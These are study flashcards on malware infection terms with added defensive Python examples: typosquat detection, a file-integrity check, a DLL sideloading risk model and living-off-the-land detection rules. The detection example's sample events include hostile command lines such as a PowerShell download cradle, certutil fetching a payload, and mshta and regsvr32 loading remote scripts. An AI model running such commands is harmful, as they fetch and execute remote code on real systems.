CH03 Malware Infections Flashcards

1
Q

What is a threat vector ?

A

The method an attacker uses to reach a victim's machine: how the attacker gets to the machine itself, independent of what is done to it once there.

2
Q

What is Attack Vector?

A

The method an attacker uses to gain access to a victim's machine in order to infect it with malware. It includes both how the attacker reached the machine (the threat vector) and how they are going to infect it once there.

3
Q

What is Watering hole?

A

Malware is planted on a website that the attacker knows the intended victims will visit, so the victims infect themselves by browsing a site they already trust.

4
Q

What is Typosquatting ?

A

A URL whose address is very similar to the real one, relying on users mistyping it or not noticing the difference. Ex: amazon.com vs. amazonS.com
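
The following is an added example, not part of the original flashcards: it generates the common typosquat variants of a protected domain (omission, transposition, duplication, insertion, replacement, homoglyph substitution and hyphenation) and checks domains observed in logs against them. The homoglyph table and the sample list of observed domains are constructed for illustration; the code assumes a single-label TLD such as .com, so multi-part suffixes like .co.uk are not handled.

```python
import string

# Look-alike character substitutions (homoglyphs) commonly used in typosquats.
# Assumption: a small illustrative table, not an exhaustive list.
HOMOGLYPHS = {
    "m": ("rn", "nn"),
    "l": ("1", "i"),
    "i": ("l", "1"),
    "o": ("0",),
    "w": ("vv",),
    "d": ("cl",),
}

ALPHABET = string.ascii_lowercase + string.digits


def typosquat_variants(domain):
    """Return {variant_domain: technique} for common typosquats of `domain`.

    Only the registrable label (e.g. "amazon" in "amazon.com") is mutated and
    the TLD is kept. Assumption: single-label TLD; ".co.uk" style suffixes are
    not handled by this model.
    """
    label, _, tld = domain.lower().rpartition(".")
    if not label:            # no dot at all: treat the whole string as the label
        label, tld = tld, ""

    variants = {}

    def add(candidate, technique):
        if candidate != label:
            # setdefault keeps the first (more specific) technique recorded
            variants.setdefault(candidate, technique)

    for i, ch in enumerate(label):
        add(label[:i] + label[i + 1:], "omission")                           # amazn
        if i + 1 < len(label):
            add(label[:i] + label[i + 1] + ch + label[i + 2:], "transposition")  # amaozn
        add(label[:i] + ch + label[i:], "duplication")                        # amazzon
        for glyph in HOMOGLYPHS.get(ch, ()):
            add(label[:i] + glyph + label[i + 1:], "homoglyph")               # arnazon
        if i > 0:
            add(label[:i] + "-" + label[i:], "hyphenation")                   # ama-zon

    for i in range(len(label) + 1):
        for ch in ALPHABET:
            add(label[:i] + ch + label[i:], "insertion")                       # amazons
            if i < len(label) and ch != label[i]:
                add(label[:i] + ch + label[i + 1:], "replacement")             # amazom

    suffix = "." + tld if tld else ""
    return {v + suffix: t for v, t in variants.items()}


def classify_lookalike(observed, protected):
    """Return the typosquat technique if `observed` imitates `protected`, else None."""
    return typosquat_variants(protected).get(observed.lower())


def find_lookalikes(observed_domains, protected_domains):
    """Scan observed domains (e.g. from DNS or proxy logs) for typosquats of protected ones."""
    hits = []
    for protected in protected_domains:
        table = typosquat_variants(protected)
        for observed in observed_domains:
            technique = table.get(observed.lower())
            if technique:
                hits.append((observed, protected, technique))
    return hits


if __name__ == "__main__":
    # Constructed sample of domains seen in outbound DNS queries.
    seen = ["amazons.com", "amazon.com", "arnazon.com", "example.org", "amaozn.com"]
    for hit in find_lookalikes(seen, ["amazon.com"]):
        print("%s looks like %s (%s)" % hit)
```

In practice the protected list is your own brands plus the SaaS and vendor domains your users log in to, and the observed list comes from DNS or proxy logs; a hit on a freshly registered domain that also serves a login page is the classic phishing setup.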

5
Q

What is a zombie ?

A

A compromised computer that is under the attacker's control, typically as one member of a botnet.

6
Q

What is Botnet

A

A collection of compromised computers (zombies) under the control of a master node.

7
Q

What is Command and Control (C2)

A

The node (or infrastructure) from which the attacker controls the hundreds or thousands of compromised computers that make up a botnet, sending them commands and receiving their results.

8
Q

What is Active Interception ?

A

Occurs when a computer is placed between the sender and receiver and is able to capture or modify the traffic between them. Example: an attacker broadcasts a fake Wi-Fi network that pretends to be a public hotspot; all of the victim's network traffic then passes through the attacker's computer, where it can be captured or altered.

9
Q

What is Privilege Escalation ?

A

Occurs when an attacker exploits a design flaw or bug in a system to gain access to resources that a normal user is not able to access. Typically the attacker first gains access to the system as an ordinary user and then finds a way to escalate that user's privileges to an administrator role.

10
Q

What are Backdoors ?

A

Backdoors are used to bypass normal security and authentication functions. A Remote Access Trojan (RAT) acts like a backdoor by granting the attacker persistent remote access to the infected system.

11
Q

What is an Easter Egg?

A

Non-malicious code that, when invoked, displays an insider joke, a hidden message, or a secret feature.

12
Q

What is Logic Bomb ?

A

Malicious code inserted inside a program that executes only when certain conditions have been met (for example a specific date or time).

13
Q

What is dropper and downloader?

A

One of the exploitation techniques used by an APT (Advanced Persistent Threat): run lightweight shellcode on the victim's system first, which then downloads the rest of the malicious code.

Dropper - Malware designed to install or run other types of malware embedded in a payload on an infected host. This is usually the stage-one component, the code the victim first receives; once it runs, it goes out and fetches further code using its own downloader.

Downloader - A piece of code that connects to the internet to retrieve additional tools after the initial infection by a dropper.

Droppers are likely to implement anti-forensics and anti-analysis techniques to prevent detection and analysis, such as encrypting, compressing, or obfuscating their payloads, which makes reverse engineering much harder.

14
Q

What is Code Injection ?

A

An exploit technique that runs malicious code inside a legitimate process, so the malicious code executes under that process's identification number (PID) and appears to be part of a trusted program.

15
Q

What is Masquerading ?

A

The dropper replaces a genuine executable with a malicious one, so the malware runs under the name and path of a trusted program.
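
The check a defender wants against this is a file-integrity baseline: hash every executable in a program directory while it is known-good, then re-hash later and report anything whose contents changed under the same name. The following is an added example, not part of the original flashcards; the program directory and the "genuine" and "malicious" file contents are constructed stand-ins in a temporary directory.

```python
import hashlib
import os
import tempfile


def sha256_of(path):
    """Hash a file in chunks so large binaries do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(directory):
    """Record the SHA-256 of every regular file under `directory` while it is known-good."""
    baseline = {}
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            baseline[os.path.relpath(path, directory)] = sha256_of(path)
    return baseline


def check_against_baseline(directory, baseline):
    """Compare the directory's current state with the baseline.

    Returns three lists: files whose contents changed (a genuine executable
    replaced by a different binary under the same name, i.e. masquerading),
    files that disappeared, and files that appeared after the baseline was taken.
    """
    current = build_baseline(directory)
    return {
        "replaced": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "missing": sorted(p for p in baseline if p not in current),
        "new": sorted(p for p in current if p not in baseline),
    }


def demo():
    """Constructed scenario: a known-good tool is swapped for a different binary."""
    with tempfile.TemporaryDirectory() as app_dir:
        # Constructed stand-ins for the program directory's executables.
        with open(os.path.join(app_dir, "updater.exe"), "wb") as f:
            f.write(b"MZ genuine updater " + b"\x00" * 64)
        with open(os.path.join(app_dir, "helper.dll"), "wb") as f:
            f.write(b"MZ genuine helper " + b"\x00" * 64)

        baseline = build_baseline(app_dir)

        # The "dropper" overwrites updater.exe with its own payload: same name, same path.
        with open(os.path.join(app_dir, "updater.exe"), "wb") as f:
            f.write(b"MZ malicious payload " + b"\x90" * 64)
        # ...and drops an extra file alongside it.
        with open(os.path.join(app_dir, "svchost.exe"), "wb") as f:
            f.write(b"MZ definitely not the real svchost")

        return check_against_baseline(app_dir, baseline)


if __name__ == "__main__":
    print(demo())
```

The baseline must be stored somewhere the attacker cannot rewrite (otherwise the dropper simply updates it too), and on Windows the hash check is complemented by verifying the replaced file's Authenticode signature, since a masqueraded binary will usually be unsigned or signed by someone other than the vendor.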

16
Q

What is DLL injection ?

A

The dropper forces a legitimate process to load a malicious DLL into its address space, so the malicious code runs inside that trusted process.

17
Q

What is DLL sideloading

A

The dropper exploits a vulnerability in a legitimate program's manifest (or abuses its DLL search order) to get a malicious DLL loaded at runtime in place of the one the program expected.
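
What makes sideloading work is the order in which Windows searches for a DLL that the program asks for by bare name: the application's own directory is consulted before System32, so a malicious copy dropped next to the executable wins, unless the name is a KnownDLL, which is always mapped from System32. The following is an added example, not part of the original flashcards: a simplified model of that search order that flags, for a constructed program directory and import list, which DLLs a dropper could sideload. The KnownDLLs subset, the directory listings, and the assumption that the application directory is user-writable are all constructed for illustration; the real loader also honours manifests, SetDllDirectory and LoadLibraryEx flags, which this model ignores.

```python
# Windows DLL search order with SafeDllSearchMode enabled (the default).
# Assumption: a simplified model of the loader's behaviour.
SAFE_SEARCH_ORDER = ("app_dir", "system32", "system16", "windows", "cwd", "path")

# With SafeDllSearchMode disabled the current directory is searched right after
# the application directory, which widens the window for hijacks.
UNSAFE_SEARCH_ORDER = ("app_dir", "cwd", "system32", "system16", "windows", "path")

# A subset of the KnownDLLs list; these are always mapped from System32 and
# cannot be sideloaded. Assumption: illustrative subset only.
KNOWN_DLLS = {"ntdll.dll", "kernel32.dll", "kernelbase.dll", "user32.dll",
              "gdi32.dll", "advapi32.dll", "ole32.dll", "shell32.dll"}

# Locations an unprivileged user can write to in this model. Assumption: the
# application directory is user-writable (e.g. an app installed under the
# user's profile), which is what makes sideloading practical without admin rights.
WRITABLE = {"app_dir", "cwd", "path"}

# Constructed directory listings (lower-case file names) for the demo.
SAMPLE_DIRS = {
    "app_dir": {"app.exe", "version.dll", "ntdll.dll"},
    "system32": {"ntdll.dll", "kernel32.dll", "version.dll", "dbghelp.dll"},
    "windows": set(),
    "cwd": {"dbghelp.dll"},
}
# Constructed import table of app.exe.
SAMPLE_IMPORTS = ["kernel32.dll", "ntdll.dll", "version.dll", "dbghelp.dll", "plugin_helper.dll"]


def resolve_dll(name, dirs, order=SAFE_SEARCH_ORDER):
    """Return the search location that would satisfy a LoadLibrary(name) call.

    `dirs` maps each location to the set of file names it contains.
    """
    name = name.lower()
    if name in KNOWN_DLLS:
        return "system32"
    for location in order:
        if name in dirs.get(location, set()):
            return location
    return None


def sideload_risks(imports, dirs, order=SAFE_SEARCH_ORDER):
    """Classify each imported DLL by how a dropper could get its own copy loaded.

    Returns {dll_name: risk} where risk is one of:
      "sideload" - resolved from the (writable) application directory
      "phantom"  - no copy exists anywhere, so the first writable search directory wins
      "hijack"   - resolved from some other writable directory (cwd or PATH)
      None       - resolved from a system directory, or a KnownDLL
    """
    risks = {}
    for dll in imports:
        dll = dll.lower()
        where = resolve_dll(dll, dirs, order)
        if dll in KNOWN_DLLS:
            risks[dll] = None
        elif where is None:
            risks[dll] = "phantom"
        elif where in WRITABLE:
            risks[dll] = "sideload" if where == "app_dir" else "hijack"
        else:
            risks[dll] = None
    return risks


def demo():
    """Triage the constructed app.exe under the default (safe) search order."""
    return sideload_risks(SAMPLE_IMPORTS, SAMPLE_DIRS)


if __name__ == "__main__":
    for dll, risk in demo().items():
        print(f"{dll:20s} -> {risk}")
```

Two things the demo makes visible: a copy of ntdll.dll sitting in the app directory is harmless because KnownDLLs bypass the search, while version.dll (a classic sideloading target because so many programs import it) is loaded from the app directory ahead of the genuine System32 copy; and an import that exists nowhere on the system is a "phantom" the attacker can satisfy from the first writable directory in the order.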

18
Q

What is Process hollowing ?

A

The dropper starts a legitimate process in a suspended state and then rewrites the memory locations containing that process's code with the malware code before resuming it. The attacker is taking over a region of memory inside a trusted process and putting malicious code there.

19
Q

What is Living off the Land ?

A

Exploit techniques that use standard system tools and packages already present on the system to perform intrusions, which makes them very difficult to find.

For example, attackers might use a built-in tool such as PowerShell to carry out malicious activity. Detection of an adversary is more difficult when they are executing malicious code within standard tools and processes (living off the land), because the tools themselves are legitimate and routinely used by administrators.
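
Because the binaries are legitimate, detection has to key on how they are invoked rather than on what they are: the command line and the parent process. The following is an added example, not part of the original flashcards, that runs a small set of such rules over constructed process-creation events (PowerShell encoded or download-cradle command lines, certutil fetching or decoding files, mshta and regsvr32 pulling remote scripts, and an Office application spawning a shell). The rule patterns are an illustrative subset written from the well-known abuse of each binary, not a complete catalogue; the sample events, paths and the 203.0.113.0/24 documentation addresses are constructed.

```python
import re

# Each rule: (name, regex the image file name must fully match, regex searched in the command line).
# Assumption: illustrative patterns, not a complete LOLBin catalogue.
RULES = [
    ("powershell_encoded_command", r"powershell\.exe|pwsh\.exe",
     r"(?i)\s-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}"),
    ("powershell_download_cradle", r"powershell\.exe|pwsh\.exe",
     r"(?i)(downloadstring|downloadfile|net\.webclient).*(iex|invoke-expression)"
     r"|(iex|invoke-expression).*(downloadstring|downloadfile|net\.webclient)"),
    ("certutil_download_or_decode", r"certutil\.exe", r"(?i)-(urlcache|decode)\b"),
    ("mshta_remote_script", r"mshta\.exe", r"(?i)\b(https?:|javascript:|vbscript:)"),
    ("regsvr32_scriptlet", r"regsvr32\.exe", r"(?i)/i:|scrobj\.dll"),
    ("rundll32_script", r"rundll32\.exe", r"(?i)javascript:|vbscript:"),
    ("bitsadmin_transfer", r"bitsadmin\.exe", r"(?i)/transfer"),
    ("wmic_process_create", r"wmic\.exe", r"(?i)process\s+call\s+create"),
]

# Parent/child rule: an Office document should not be starting a shell or script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Constructed process-creation events (image, parent image, command line).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -nop -w hidden -enc "
                     "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://203.0.113.10/p.ps1')\""},
    {"image": r"C:\Windows\System32\certutil.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "certutil.exe -urlcache -split -f http://203.0.113.10/stage2.bin stage2.bin"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "certutil.exe -verify server.cer"},
    {"image": r"C:\Windows\System32\mshta.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "mshta.exe http://203.0.113.10/a.hta"},
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "regsvr32.exe /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "rundll32.exe shell32.dll,Control_RunDLL"},
]


def image_name(path):
    """Reduce a full image path to its lower-case file name."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def match_rules(event):
    """Return the names of every rule the event trips, in rule order."""
    hits = []
    image = image_name(event["image"])
    cmd = event.get("command_line", "")
    for name, image_re, cmd_re in RULES:
        if re.fullmatch(image_re, image) and re.search(cmd_re, cmd):
            hits.append(name)
    parent = image_name(event.get("parent_image", ""))
    if parent in OFFICE_PARENTS and image in SHELLS:
        hits.append("office_spawns_shell")
    return hits


def scan(events):
    """Run every rule over every event; returns {event_index: [rule names]} for events that hit."""
    findings = {}
    for i, event in enumerate(events):
        hits = match_rules(event)
        if hits:
            findings[i] = hits
    return findings


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["command_line"][:60], "->", ", ".join(hits))
```

The two benign events (a scheduled PowerShell script and certutil verifying a certificate) produce no findings, which is the point: the same binary is fine or suspicious depending on its arguments and parent, so these rules belong on process-creation telemetry that records the full command line, not on a simple list of "bad" executables.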